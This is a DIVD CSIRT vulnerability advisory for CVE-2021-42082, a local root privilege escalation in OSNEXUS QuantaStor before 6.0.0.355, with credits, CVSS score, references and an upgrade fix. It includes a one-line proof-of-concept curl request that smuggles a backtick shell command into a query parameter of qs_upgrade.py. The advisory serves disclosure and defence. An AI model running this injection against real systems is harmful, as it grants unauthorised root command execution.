CVE-2021-42082

Local Privilege Escalation to root in OSNEXUS QuantaStor before 6.0.0.355

CVE

CVE-2021-42082

Title

Local Privilege Escalation to root in OSNEXUS QuantaStor before 6.0.0.355

Credits

Wietse Boonstra (DIVD) (finder)
Frank Breedijk (DIVD) (analyst)
Victor Pasman (DIVD) (analyst)
Victor Gevers (DIVD) (analyst)
Max van der Horst (DIVD) (analyst)
Célistine Oosting (DIVD) (analyst)

Affected products

Product	Affected	Unaffected	Unknown
OSNEXUS QuantaStor on Windows, Linux	>= 0 to < 6.0.0.355 (semver)
OSNEXUS QuantaStor on Windows, Linux			everything else

CVSS

Base score: 7.8 (HIGH)

References

https://www.wbsec.nl/osnexus ( third-party-advisory, technical-description, exploit )
https://csirt.divd.nl/DIVD-2021-00020/ ( third-party-advisory )
https://www.osnexus.com/products/software-defined-storage ( product )
https://csirt.divd.nl/CVE-2021-42082 ( third-party-advisory, technical-description, exploit )

Problem type(s)

CWE-269 Improper Privilege Management

Date published

Last modified

11 Mar 2025 13:39 UTC

Description

Local users are able to execute scripts under root privileges.

POC

On the local host run the following command:

curl 'localhost:8154/qstor/qs_upgrade.py?taskId=1&a=;`whoami`'

Solution(s)

Upgrade to the latest version of OSNEXUS QuantaStor.

JSON version.

DIVD CSIRT

CVE-2021-42082

Local Privilege Escalation to root in OSNEXUS QuantaStor before 6.0.0.355

Description

Solution(s)